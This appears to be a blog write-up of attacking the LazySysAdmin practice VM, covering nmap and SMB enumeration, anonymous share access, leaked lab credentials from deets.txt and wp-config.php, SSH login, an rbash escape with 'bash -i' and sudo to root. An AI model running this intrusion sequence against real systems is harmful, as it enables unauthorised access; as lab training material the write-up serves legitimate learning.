We first start off with a nmap scan of the remote host.
root@ubuntu:~# nmap -Pn -sS -sV -sC -T5 192.168.56.101 Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-11 19:30 MDT Nmap scan report for raven.local (192.168.56.101) Host is up (0.00098s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: 192.168.56.1 |_ error: Closing link: (nmap@192.168.56.1) [Client exited] MAC Address: 08:00:27:1D:69:9D (Oracle VirtualBox virtual NIC) Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -6h00m01s, deviation: 0s, median: -6h00m01s |_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user:, NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2019-10-12T05:30:43+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-10-11 13:30:43 |_ start_date: 1600-12-31 17:00:04 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.19 seconds root@ubuntu:~#
Here we have an HTTP server running on the remote hosts and a robots.txt exists. nmap provides us with the entries of the robots.txt for easy access.
80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode
We ran dirb against the website and found some interesting directories.
http://192.168.56.101/info.php http://192.168.56.101/phpmyadmin/
If we look at http://192.168.56.101/info.php it gives us a lot of good information like kernel version and other php related information.
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 PHP/5.5.9-1ubuntu4.22 mysql 5.5.57 _SERVER["DOCUMENT_ROOT"] /var/www/html allow_url_fopen On allow_url_include Off open_basedir no value
The site is running wordpress 4.8.1 which isnt vulnerable to any exploits according to searchsploit so I move on to try and brute force the admin login for wordpress.
[+] admin | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
I tried to brute force the admin login of wordpress with wpscan but it didnt pan out. So now I moved on to SMB enueration.
SMB Enumeration
If we look at the results of the nmap scan we can see the remote host is serving up shares.
Host script results: |_clock-skew: mean: -6h00m01s, deviation: 0s, median: -6h00m01s |_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user:, NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2019-10-12T05:30:43+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-10-11 13:30:43 |_ start_date: 1600-12-31 17:00:04
We'll start off using smbclient to see what we can do.
root@ubuntu:~# smbclient -L //192.168.56.101 -N WARNING: The "syslog" option is deprecated Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers share$ Disk Sumshare IPC$ IPC IPC Service (Web server) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LAZYSYSADMIN root@ubuntu:~#
We can see three shares are present but the share 'share$' looks interesting. Lets try to connect to the share with no password.
root@ubuntu:~# smbclient -N //192.168.56.101/share$ WARNING: The "syslog" option is deprecated Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Aug 15 05:05:52 2017 .. D 0 Mon Aug 14 06:34:47 2017 wordpress D 0 Tue Aug 15 05:21:08 2017 Backnode_files D 0 Mon Aug 14 06:08:26 2017 wp D 0 Tue Aug 15 04:51:23 2017 deets.txt N 139 Mon Aug 14 06:20:05 2017 robots.txt N 92 Mon Aug 14 06:36:14 2017 todolist.txt N 79 Mon Aug 14 06:39:56 2017 apache D 0 Mon Aug 14 06:35:19 2017 index.html N 36072 Sat Aug 5 23:02:15 2017 info.php N 20 Tue Aug 15 04:55:19 2017 test D 0 Mon Aug 14 06:35:10 2017 old D 0 Mon Aug 14 06:35:13 2017 3029776 blocks of size 1024. 1435904 blocks available smb: \>
It drops us to the smb prompt meaning we can access the share anonymously. It looks like the share is the http document root. There are some interesting files like deets.txt and todolist.txt both of these we will download to our local box.
get deets.txt getting file \deets.txt of size 139 as deets.txt (8.0 KiloBytes/sec) (average 8.0 KiloBytes/sec) smb: \> get todolist.txt getting file \todolist.txt of size 79 as todolist.txt (4.5 KiloBytes/sec) (average 6.3 KiloBytes/sec) smb: \> deets.txt CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345 todolist.txt Prevent users from being able to view to web root using the local file browser Another file I would like to get is the wp-config.php file to read the database user and password. smb: \> cd wordpress smb: \wordpress\> get wp-config.php getting file \wordpress\wp-config.php of size 3703 as wp-config.php (190.3 KiloBytes/sec) (average 60.5 KiloBytes/sec) smb: \wordpress\>
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
Now that we have a database user and password we can go back and try to login to phpmyadmin and run queries that way.
We logged in successfully now let search the wp_users table for the logins to the blog.
It looks like we dont have permission to run the select query against the wordpress database.
If we go back and take a look at the clues we found earlier, we see that we have a password to some account on the server. My first instinct was to check SSH to see if maybe that was the users password. But we do not have a valid user name for the user yet. If we go back again to the blog running on the server we see this:
root@ubuntu:~# ssh togie@192.168.56.101 The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established. ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts. ################################################################################################## # Welcome to Web_TR1 # # All connections are monitored and recorded # # Disconnect IMMEDIATELY if you are not an authorized user! # ################################################################################################## togie@192.168.56.101's password: Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: https://help.ubuntu.com/ System information disabled due to load higher than 1.0 133 packages can be updated. 0 updates are security updates. togie@LazySysAdmin:~$
It Worked! Well great now we have shell access to the server let run a few command and see what we can find.
togie@LazySysAdmin:~$ cd .. -rbash: cd: restricted togie@LazySysAdmin:~$ echo $SHELL /bin/rbash togie@LazySysAdmin:~$
We are in a restricted environment. What we need to do is break out of this rbash shell to a regular bash shell. One thing we can't do is run any commands with a '/' in them, so to run a regular bash shell you would run 'bash -i' and then try and change directories.
togie@LazySysAdmin:~$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games togie@LazySysAdmin:~$ bash -i togie@LazySysAdmin:~$ cd .. togie@LazySysAdmin:/home$
Now that we have broken out of the restricted shell is time to check sudo and see what if any privleges the user togie has.
togie@LazySysAdmin:/home$ sudo -l
[sudo] password for togie:
Matching Defaults entries for togie on LazySysAdmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User togie may run the following commands on LazySysAdmin:
(ALL : ALL) ALL
togie@LazySysAdmin:~$ sudo -s
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~#
We have all privleges and a root shell.
No comments:
Post a Comment